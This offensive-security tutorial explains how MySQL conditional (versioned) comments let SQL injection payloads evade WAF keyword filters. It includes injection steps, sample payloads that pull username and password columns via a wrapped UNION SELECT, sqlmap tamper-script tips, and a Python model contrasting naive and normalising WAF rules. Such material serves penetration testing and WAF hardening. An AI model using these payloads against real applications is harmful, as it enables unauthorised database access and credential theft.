Conditional Comments
Context
This article covers the use of MySQL conditional (versioned) comments to get SQL injection payloads past a Web Application Firewall (WAF). Readers should be familiar with SQL comment syntax, with how WAFs match and block requests, and with general MySQL WAF bypass techniques.
Theory
MySQL Conditional Comments
In MySQL, conditional comments are a MySQL-specific feature (also honoured by MariaDB): the text inside the comment is executed as SQL, but only when the server's version is at least the version the comment names. Any other database, and any WAF that treats /* ... */ as an ordinary comment, sees nothing to execute. Attackers use this to obfuscate injected queries so that a WAF does not recognise the SQL it is actually looking at.
Versioned Comments Syntax
MySQL's conditional comments embed SQL inside an ordinary C-style comment that starts with /*!. The syntax is:
/*!version_number SQL_statement */
version_number is a five-digit number of the form MMmmrr, so 50000 means 5.0.0 and 50700 means 5.7.0. The server executes the enclosed text, in place, as part of the surrounding statement only if its own version is greater than or equal to that number; an older server ignores the contents as a comment. If the version number is omitted (/*! SQL_statement */) MySQL always executes the contents. Because the comment body is spliced into the statement, it must be valid SQL at that position, and a keyword can be wrapped with no separating space, e.g. /*!50000SELECT*/. This is what makes the feature useful for injection: a filter that follows the SQL standard treats the whole construct as a comment, while the MySQL backend treats it as live code.
Obfuscation Techniques
Conditional comments work as an obfuscation strategy because the WAF and the database parse the same bytes differently. A signature written for a pattern such as UNION SELECT never matches /*!50000UNION*/ /*!50000SELECT*/: a rule that inspects the raw request sees comment delimiters between the keywords, and a rule that strips comments before matching loses the keywords altogether. MySQL, which executes the comment bodies, still receives the original UNION SELECT. The technique therefore defeats filters that do not normalise input the way the backend does. Mature rulesets do carry signatures for the /*! sequence itself, so expect this to work mainly against simple keyword filters and to need combining with other tricks elsewhere.
Practice
Using Conditional Comments for WAF Bypass
Here is a step-by-step guide to using MySQL conditional comments to bypass a WAF at an SQL injection point:
- Identify the SQL injection point: find the input field or parameter that reaches a MySQL query unsanitised, for example by replaying the request in Burp Suite Repeater and watching for database errors or response differences when the value is altered.
- Execute a test query with conditional comments: wrap a harmless part of the query in a versioned comment and observe the behaviour, i.e. inject a payload that makes the backend run the equivalent of
SELECT /*!50000 1,2,3*/ FROM users WHERE id=1;
The use of
/*!50000 1,2,3*/
instructs a MySQL server of version 5.0.0 or higher to execute the enclosed text, so the query behaves exactly like SELECT 1,2,3 FROM users WHERE id=1. Two things are checked at once: if the request is not blocked, the WAF let the comment through; if the response matches the plain query instead of erroring (a server that ignores the comment runs the invalid SELECT FROM users ...), the backend is MySQL and executed the comment body.
- Test a malicious query with conditional comments: once both checks pass, wrap the sensitive parts of the real payload the same way, e.g.
SELECT /*!50000 username,password*/ FROM users WHERE id=1;
and confirm that it passes the WAF and returns the column values. If the WAF still blocks, move the comment boundaries (wrap individual keywords such as /*!50000UNION*/ rather than whole column lists) and retry.
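The following Python script is added here as an illustration and is not part of the original article or of any WAF product. It models both the theory above and the three steps just described: how a MySQL server of a given version reads a versioned comment, how a UNION SELECT payload is wrapped keyword by keyword, and why a signature rule that strips comments misses the result while one that expands versioned comments before matching does not. The sample payload, the regexes and the two toy WAF rules are constructed for the example.

```python
import re

# MySQL executes the body of /*!NNNNN ... */ only when its own version,
# encoded as MMmmrr (50000 = 5.0.0, 50700 = 5.7.0), is >= NNNNN; /*! ... */
# with no number is executed unconditionally. Any other /* ... */ is a comment.
# This model covers the five-digit form discussed in the article.
VERSIONED_COMMENT = re.compile(r"/\*!(\d{5})?(.*?)\*/", re.DOTALL)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)

# Signature a simple WAF rule might use for a UNION-based injection (constructed).
UNION_SELECT = re.compile(r"\bunion\b[\s\S]*?\bselect\b", re.IGNORECASE)


def mysql_view(sql: str, server_version: int) -> str:
    """Return the text a MySQL server of the given version actually parses."""
    def expand(match: re.Match) -> str:
        required = int(match.group(1)) if match.group(1) else 0
        return match.group(2) if server_version >= required else ""
    expanded = VERSIONED_COMMENT.sub(expand, sql)
    return PLAIN_COMMENT.sub("", expanded)


def wrap_keywords(payload: str, version: str = "50000",
                  keywords=("UNION", "SELECT", "FROM", "WHERE")) -> str:
    """Obfuscate a payload by wrapping each listed keyword in a versioned comment.

    A MySQL server at or above `version` still sees the keywords; the request
    as sent never contains 'UNION SELECT' as a contiguous string.
    """
    pattern = re.compile(r"\b(" + "|".join(keywords) + r")\b", re.IGNORECASE)
    return pattern.sub(lambda m: f"/*!{version}{m.group(0)}*/", payload)


def naive_waf_blocks(request_param: str) -> bool:
    """Toy rule that treats every /* ... */ as a comment, strips it, then matches."""
    stripped = PLAIN_COMMENT.sub(" ", request_param)
    return bool(UNION_SELECT.search(stripped))


def hardened_waf_blocks(request_param: str) -> bool:
    """Toy rule that normalises the way the backend will: expand versioned
    comments assuming the newest possible server (so every /*!NNNNN*/ body is
    kept), then run the same signature."""
    normalised = mysql_view(request_param, server_version=99999)
    return bool(UNION_SELECT.search(normalised))


# Constructed sample payload (not from the article), as it would be injected
# into an id parameter of a query such as SELECT ... FROM users WHERE id='$id'.
BASE_PAYLOAD = "1' UNION SELECT username, password FROM users-- -"
OBFUSCATED_PAYLOAD = wrap_keywords(BASE_PAYLOAD)


if __name__ == "__main__":
    print("sent:        ", OBFUSCATED_PAYLOAD)
    print("MySQL 5.7:   ", mysql_view(OBFUSCATED_PAYLOAD, 50700))
    print("MySQL 4.1:   ", mysql_view(OBFUSCATED_PAYLOAD, 40100))
    print("naive WAF:   ", "blocked" if naive_waf_blocks(OBFUSCATED_PAYLOAD) else "allowed")
    print("hardened WAF:", "blocked" if hardened_waf_blocks(OBFUSCATED_PAYLOAD) else "allowed")
```

Running the script shows the asymmetry the article relies on: the naive rule lets the wrapped payload through, a MySQL 5.7 server reconstructs the original UNION SELECT from it, and a pre-5.0 server (or a non-MySQL backend) drops the keywords and is left with a broken statement, which is the error you watch for in the test-query step. The hardened rule blocks the payload only because it expands versioned comments the same way the backend does; that normalisation step, not a longer keyword list, is the defensive fix.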
Outcome
If these steps succeed, the injected statements reach MySQL without the WAF's keyword signatures firing, which means its input validation and detection have been bypassed and, absent other controls such as parameterised queries in the application, the data the query selects is exposed.
Tools
- sqlmap
- Burp Suite
These tools help discover and exploit SQL injection points and automate the bypass: sqlmap's versionedkeywords and versionedmorekeywords tamper scripts wrap keywords in MySQL versioned comments automatically, and Burp Suite's Repeater and Intruder are convenient for hand-crafting and fuzzing where the comment boundaries go.